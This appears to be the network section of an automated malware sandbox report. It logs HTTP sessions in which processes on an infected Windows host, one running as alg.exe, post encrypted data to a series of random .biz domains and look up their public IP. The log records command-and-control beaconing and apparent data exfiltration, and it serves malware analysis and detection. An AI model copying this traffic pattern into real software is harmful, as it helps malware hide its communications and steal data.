Nov 22, 2024 18:55:05.483361959 CET	832	OUT	Data Raw: 57 18 da f6 2b e6 d6 12 34 03 00 00 90 b7 2f 8b 0c 12 0d f2 e2 0d ed 1a c6 17 50 80 b4 8a 98 4e 4c 43 4c 52 74 2c 84 da 6e 28 45 88 2a b2 54 26 3e 34 42 32 4e ce 73 80 bb 61 d5 68 dc fb bc 0b 5c ec 71 77 e0 b0 95 05 b5 9d c5 cb 28 1f 00 2b bd 50 Data Ascii: W+4/PNLCLRt,n(E*T&>4B2Nsah\qw(+PD(JUGTVTcJ}?3oc"b_favYX:['{{UD@?A']i7gKJg$UJ$\|bs#h:@b>WS6QVrnG8K
Nov 22, 2024 18:55:06.889367104 CET	411	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 22 Nov 2024 17:55:06 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=a3d4db1d49a682257e2de79e5c26a862\|8.46.123.75\|1732298106\|1732298106\|0\|1\|0; path=/; domain=.pywolwnvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49709	54.244.188.177	80	1716	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Nov 22, 2024 18:55:07.874989986 CET	352	OUT	POST /ncgaeohbois HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: cvgrf.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Nov 22, 2024 18:55:07.875005960 CET	778	OUT	Data Raw: 9c 24 19 41 a2 24 1c 67 fe 02 00 00 6d e8 1d 04 53 ba 8c cc e4 bd 8f e4 6b 4d 9f ae 0a 4b f7 f6 52 d7 13 28 4d 15 b4 48 d9 5b 15 a7 b5 08 d0 91 97 d2 cc 07 b7 13 3d 25 65 c1 42 e7 06 31 fd 0d 58 91 19 bb 34 4d 66 28 9f 63 f9 05 03 f7 76 97 48 62 Data Ascii: $A$gmSkMKR(MH[=%eB1X4Mf(cvHb054_B`y}L[^CYrQ7Zqh)$ay*KjIh:oK /2l5NYfL&)VSw)2<gDG:B
Nov 22, 2024 18:55:09.302017927 CET	407	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 22 Nov 2024 17:55:09 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=314e92fadd32ce50bc95948b2d51c55f\|8.46.123.75\|1732298109\|1732298109\|0\|1\|0; path=/; domain=.cvgrf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49710	132.226.8.169	80	4324	C:\Users\user\AppData\Local\Temp\server01.exe

Timestamp	Bytes transferred	Direction	Data
Nov 22, 2024 18:55:08.117968082 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 22, 2024 18:55:10.737875938 CET	272	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 17:55:10 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>
Nov 22, 2024 18:55:10.747299910 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Nov 22, 2024 18:55:11.250415087 CET	272	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 17:55:11 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49711	44.221.84.105	80	1716	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Nov 22, 2024 18:55:10.300566912 CET	356	OUT	POST /xmmfsweyvhue HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: npukfztj.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Nov 22, 2024 18:55:10.300607920 CET	778	OUT	Data Raw: 33 34 85 c2 ec 7e 84 6b fe 02 00 00 5f 1b d5 6b 41 94 45 37 69 17 d1 49 13 15 f6 89 6e c9 19 40 c6 94 41 86 9e c7 1f ce c3 6a 8f 2f e5 4c a5 b4 10 6a 40 af 36 c9 78 f5 5c 04 d0 38 1e 02 2d e7 09 02 45 d2 89 24 20 8c d4 b1 50 b9 36 1c 5e 8d d7 aa Data Ascii: 34~k_kAE7iIn@Aj/Lj@6x\8-E$ P6^3wc0sq9:"$i8\>NM!<0h35vw[46e.I/W5p`XKy/"_NH/\yZq_@Lv#\@\|H./7Nh`bKE%[D
Nov 22, 2024 18:55:11.415122032 CET	410	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 22 Nov 2024 17:55:11 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=ce8e4df3a5d61c3616ad506b914dbf19\|8.46.123.75\|1732298111\|1732298111\|0\|1\|0; path=/; domain=.npukfztj.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49713	172.234.222.143	80	1716	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Nov 22, 2024 18:55:12.244936943 CET	357	OUT	POST /hvtqtjugbboqpm HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: przvgke.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Nov 22, 2024 18:55:12.245002985 CET	778	OUT	Data Raw: fe 8c f1 45 ae 76 83 df fe 02 00 00 10 d1 49 44 cc 67 e8 50 84 3c 82 9b b4 c0 79 d2 45 30 5f 76 0d c1 05 b6 15 18 5c 6a bd 41 fc 02 3e 81 77 c2 71 8f e9 a4 63 a9 46 0a cb 74 cd 0a 5a fa 6e 5b 7d f1 a2 99 8e a4 e7 99 e6 22 68 a4 5e 8a 45 5e ca 76 Data Ascii: EvIDgP<yE0_v\jA>wqcFtZn[}"h^E^vM2jzAbhR]mPy^n<z%@Hy+yg 4=&ofraIh^-6nil(n<n!jY\MFd

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49714	172.234.222.143	80	1716	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Nov 22, 2024 18:55:13.710709095 CET	355	OUT	POST /tohnhxnrpjse HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: przvgke.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Nov 22, 2024 18:55:13.711075068 CET	778	OUT	Data Raw: bb ed 95 55 9c 24 a1 58 fe 02 00 00 5f ab a5 41 b7 d0 f7 2f cb 21 2f 01 f7 cb 5e cd aa 79 76 cb db d5 bf 64 19 56 0b 73 04 3e 50 b6 78 8c 5d c9 e4 f0 87 d7 59 da 3a eb e9 df 92 07 3e f1 95 00 6a 1d 52 3a c8 12 a7 04 72 b1 d2 85 a1 12 b0 c5 1c 37 Data Ascii: U$X_A/!/^yvdVs>Px]Y:>jR:r73stl:0L`M/KTU<C3bujT2jfU@\7'^Ou~I@%7/kPhP`sGZ2bJq

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	49715	54.244.188.177	80	6804	C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe

Timestamp	Bytes transferred	Direction	Data
Nov 22, 2024 18:55:15.779052019 CET	356	OUT	POST /ksmybghbmbq HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: pywolwnvd.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 830
Nov 22, 2024 18:55:15.779221058 CET	830	OUT	Data Raw: 19 4d 8a b1 56 0e 21 a2 32 03 00 00 62 3f 61 f1 3b bd df 33 e4 cf 66 b0 5d a1 96 fe 8e 43 02 8b 4a 64 77 00 91 b1 a1 e2 4a c9 43 48 f6 6f c2 70 6e 56 4a d1 7f 51 36 78 77 5f a7 2c 65 a4 bc e2 b0 ed ab 1b 38 7c 12 4b 07 d0 32 e1 41 55 7a 09 0a 3c Data Ascii: MV!2b?a;3f]CJdwJCHopnVJQ6xw_,e8\|K2AUz<0xK~\|bwRkKH.]1b+z8m5{DnX\dOh0V NBGW%kP.J!JQ9(#R kFUceG&J.>:a4Y
Nov 22, 2024 18:55:17.183105946 CET	411	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 22 Nov 2024 17:55:16 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=b3d361950abebec3f33ff315c9d9c6fc\|8.46.123.75\|1732298116\|1732298116\|0\|1\|0; path=/; domain=.pywolwnvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.5	49717	18.141.10.107	80	1716	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Nov 22, 2024 18:55:16.047712088 CET	357	OUT	POST /ywaoqfakpesqv HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: knjghuig.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Nov 22, 2024 18:55:16.047730923 CET	778	OUT	Data Raw: 54 16 04 0b 2d 11 b6 44 fe 02 00 00 b1 68 81 6a d1 79 11 b1 28 9b 5b 19 5e 5d b9 de c7 09 ae b0 08 6f 8d 0d c4 72 c4 ac 17 39 34 94 d0 90 f6 fd 9f 01 18 e9 df 7b 1a d2 73 78 2e 8b 7e f0 d2 29 01 3c 8e 49 67 81 dd 5f c9 24 e8 b0 ab 85 e0 46 2f fd Data Ascii: T-Dhjy([^]or94{sx.~)<Ig_$F/AF3hT;SgX/u@E%s%@q+#H+Yr-mz>Xn@zk2q8<kNV?$wmYhDFi\|1"c0
Nov 22, 2024 18:55:18.095194101 CET	410	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 22 Nov 2024 17:55:17 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=f6a3e2cfa3867a0366633fecddea8136\|8.46.123.75\|1732298117\|1732298117\|0\|1\|0; path=/; domain=.knjghuig.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.5	49719	18.141.10.107	80	6804	C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe

Timestamp	Bytes transferred	Direction	Data
Nov 22, 2024 18:55:17.842711926 CET	356	OUT	POST /uqppkasccjtxk HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: ssbzmoy.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 830
Nov 22, 2024 18:55:17.842730999 CET	830	OUT	Data Raw: 7b cc b1 a9 3a cc 33 d9 32 03 00 00 61 bc 8c 88 35 61 2a a9 9b 59 b9 40 31 6b 17 1e f0 02 7e b9 3f 3a 37 1e 47 47 69 2d 6f 78 44 f5 53 9d d9 d2 d5 a1 0c 36 3e cf de b8 81 03 9a 19 89 ef 07 60 ec d6 07 11 25 1b 72 5f 34 0d c0 44 45 a9 b6 ca 19 49 Data Ascii: {:32a5aY@1k~?:7GGi-oxDS6>`%r_4DEIO}7m[I5'F@FG:S6![R.Hw1Y_E4PTXJ9~B50"Se~YIB"j=itEG]?`
Nov 22, 2024 18:55:19.949023962 CET	409	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 22 Nov 2024 17:55:19 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=8f56a2fc05878f1364786778275e8ab1\|8.46.123.75\|1732298119\|1732298119\|0\|1\|0; path=/; domain=.ssbzmoy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.5	49727	82.112.184.197	80	1716	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Nov 22, 2024 18:55:20.453571081 CET	354	OUT	POST /svftqsgvqnih HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: lpuegx.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Nov 22, 2024 18:55:20.453596115 CET	778	OUT	Data Raw: d3 a3 85 1a 1c 80 0a 79 fe 02 00 00 1e 13 b0 85 85 55 0c cd 46 d7 45 95 4e 98 04 3c 92 6b fc ca 94 b9 3e 1e 08 dc 18 fa 6d 52 33 5a 6e cc 14 be 98 91 ff 8b 7c 6a 60 9c 18 6c 27 19 9a 0e 0d d3 aa cf 16 f6 d5 f9 ba fa 16 78 43 c1 6d a2 b8 eb d8 12 Data Ascii: yUFEN<k>mR3Zn\|j`l'xCmJh-9G(["qt;O~E7jq.\;u(=)T~@DqRawAQ))mO3wJ6Tas >U?XH8!- Zy-7Lx_!f

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.5	49782	82.112.184.197	80	1716	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Nov 22, 2024 18:55:42.969852924 CET	355	OUT	POST /ecjuuqdshncew HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: lpuegx.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Nov 22, 2024 18:55:42.970025063 CET	778	OUT	Data Raw: d6 ff f4 35 c4 0d 7f b2 fe 02 00 00 f3 0f ed 19 3e ec c0 bc 58 42 4e 55 c8 fe 05 b7 c5 db 36 37 2e 2c 9d ef 70 a4 cc 95 3a d9 13 de 69 e5 17 36 ad 77 9e f9 99 fb 84 8e dc e7 bb 8b 52 fc 98 b6 a7 2c 16 41 ed 43 db 0b 74 5e 9a 26 3e 56 d0 c7 4f fb Data Ascii: 5>XBNU67.,p:i6wR,ACt^&>VOd)pK\+O.tl08W,w<}tSZKR*>#S@pP:3bp#iPMF"i'Sfm5<hp(b=LHCo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.5	49833	82.112.184.197	80	1716	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Nov 22, 2024 18:56:06.142081022 CET	352	OUT	POST /fgjkxxt HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: vjaxhpbji.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Nov 22, 2024 18:56:06.142081022 CET	778	OUT	Data Raw: 9a ad 0e 4a ed b2 47 0d fe 02 00 00 f5 e6 1e 67 f9 00 42 c0 2d ef 90 a0 13 24 c9 1b 75 f8 7a 0d cf 71 7a 86 a7 83 3b 67 94 9c 71 df 53 8a 26 04 9c 12 77 ad 49 50 d0 f1 1e d1 a9 19 04 3c b1 a4 51 f1 24 0a 88 77 51 e9 74 9a 5e 06 ce bc 5a 21 68 19 Data Ascii: JGgB-$uzqz;gqS&wIP<Q$wQt^Z!hj)d3U,P]lhv:q0U;J@5//90s2XqJ5e<j\|liu~9dk-m=y}^n#AsG 9/@{p;;4]`

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.5	49884	82.112.184.197	80	1716	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Nov 22, 2024 18:56:28.311450958 CET	361	OUT	POST /dpxeblwuppuirbnx HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: vjaxhpbji.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Nov 22, 2024 18:56:28.311466932 CET	778	OUT	Data Raw: 9f 3a 83 cf 24 65 16 15 fe 02 00 00 1d 8f 96 15 d1 5b 77 93 f5 d7 46 2e 67 b2 84 d9 db 2f fe b5 da ef 67 d6 5c 7e b4 87 56 13 6c fd 55 bb 2a fc 27 09 b8 92 5d 27 3a 34 25 a7 00 5e fe c1 5a db 89 d9 be 71 5a 0b 36 23 10 db 3d df a7 d1 cf e8 8b 77 Data Ascii: :$e[wF.g/g\~VlU*']':4%^ZqZ6#=w[^ctW/jBrJ V4Ot49genb/{Q=Rcqm"RM{(kP q$HLE"P3]oe@J8` Mp&QIqN

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.5	49935	47.129.31.212	80	1716	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Nov 22, 2024 18:56:51.008776903 CET	357	OUT	POST /wjxiioeyplqiis HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: xlfhhhm.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Nov 22, 2024 18:56:51.008891106 CET	778	OUT	Data Raw: cd 5a 61 b2 40 08 86 f7 fe 02 00 00 97 c3 07 50 5a bf 68 a9 f3 25 23 40 4f d5 3e 4c e5 da 2b bf 93 25 11 25 50 ea 82 e3 e9 3d ee cf 12 c0 d0 ee 19 48 62 94 d8 09 d0 b1 8f 94 85 38 0a 7f 21 ed 21 6f f2 9c 9a e0 44 da 41 97 71 7b 29 0e 2c aa 31 da Data Ascii: Za@PZh%#@O>L+%%P=Hb8!!oDAq{),1:kr`$x1m`^=Q1&gQtu0Rdv{Ko'2{:9E5]+GBWRW:PL\!<KtP'M n~
Nov 22, 2024 18:56:53.059329033 CET	409	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 22 Nov 2024 17:56:52 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=ab96459bb8a968ab765ee34cf5ba6022\|8.46.123.75\|1732298212\|1732298212\|0\|1\|0; path=/; domain=.xlfhhhm.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.5	49942	13.251.16.150	80	1716	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Nov 22, 2024 18:56:53.815355062 CET	350	OUT	POST /jlhpxxcq HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: ifsaia.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Nov 22, 2024 18:56:53.815382957 CET	778	OUT	Data Raw: fb 45 49 06 22 c6 24 99 fe 02 00 00 5a 1b 60 dd 58 27 a2 70 34 15 99 24 e3 b7 5c fd 32 6c a6 e5 c1 ad 9f 4f 21 aa 8a 5d 65 62 49 dc d0 de 52 7f 46 42 ca c8 23 b5 62 20 0d 7f 2d ad b4 bb c5 ec 93 db be 31 97 28 f4 de 1d 44 08 e9 14 ee f8 cb a5 43 Data Ascii: EI"$Z`X'p4$\2lO!]ebIRFB#b -1(DCmq M'[a~bF YU_08n,v&=(0HOE=s-ClR7t=}_XL"_[~ZgppX"C*O;W.
Nov 22, 2024 18:56:55.906182051 CET	408	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 22 Nov 2024 17:56:55 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=16ac55c069fc04df4ea57eeed3641c0e\|8.46.123.75\|1732298215\|1732298215\|0\|1\|0; path=/; domain=.ifsaia.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.5	49949	44.221.84.105	80	1716	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Nov 22, 2024 18:56:56.598767996 CET	359	OUT	POST /xyvnmtdiyfgocm HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: saytjshyf.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Nov 22, 2024 18:56:56.598787069 CET	778	OUT	Data Raw: bd a6 63 71 66 56 8b 93 fe 02 00 00 01 7b d7 c5 63 28 93 dd 36 90 9e b4 9e bc 02 26 f0 0c 60 a9 63 dc 13 f8 49 9b 81 25 f7 52 75 5d ea 4a ca b0 57 6c 45 3c a7 b7 0a 67 dd 66 fa a4 72 cc dc b1 ca e7 10 8a 85 a1 2e 07 63 9f 2c 6b ee c0 2a 5e 2a 8b Data Ascii: cqfV{c(6&`cI%Ru]JWlE<gfr.c,k^ca<[a/s R1>>2s)!8pjQfr/?xO5\ZMoy{8W3P\afC`ga7E8&n&UybJV&*0
Nov 22, 2024 18:56:57.871642113 CET	411	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 22 Nov 2024 17:56:57 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=c1a837d8bb5329d844804df8fd673c47\|8.46.123.75\|1732298217\|1732298217\|0\|1\|0; path=/; domain=.saytjshyf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.5	49955	18.141.10.107	80	1716	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Nov 22, 2024 18:56:58.747802973 CET	353	OUT	POST /lyroetjkhx HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: vcddkls.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Nov 22, 2024 18:56:58.747802973 CET	778	OUT	Data Raw: 89 c9 92 88 e5 7e 58 c9 fe 02 00 00 f7 ca 6a f7 9e dd 7e 7e f6 af cd d2 3c 70 8a 49 5f 2d 2a d1 b9 48 bd cb 53 8c a8 6e 15 f8 02 cc e7 95 58 e7 0c 22 a6 79 f8 f5 77 c4 e3 4a 36 c4 2f c9 f1 64 d2 5f 85 85 79 6c 82 09 f8 6a 7e 31 98 ec 40 7c 52 08 Data Ascii: ~Xj~~<pI_-HSnX"ywJ6/d_ylj~1@\|RDMR&Q%_]G)`CAk8 YU+o;}i~8x+qLdCb<nCjqJdrTM)y7M @v9p$44kug>(UBq)Jq1:L?!tQ
Nov 22, 2024 18:57:00.855160952 CET	409	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 22 Nov 2024 17:57:00 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=7d45a6e335c42a3fa6303a76ddf991c1\|8.46.123.75\|1732298220\|1732298220\|0\|1\|0; path=/; domain=.vcddkls.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.5	49963	172.234.222.143	80	1716	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Nov 22, 2024 18:57:01.500308037 CET	355	OUT	POST /dydgtoryupjgtl HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: fwiwk.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
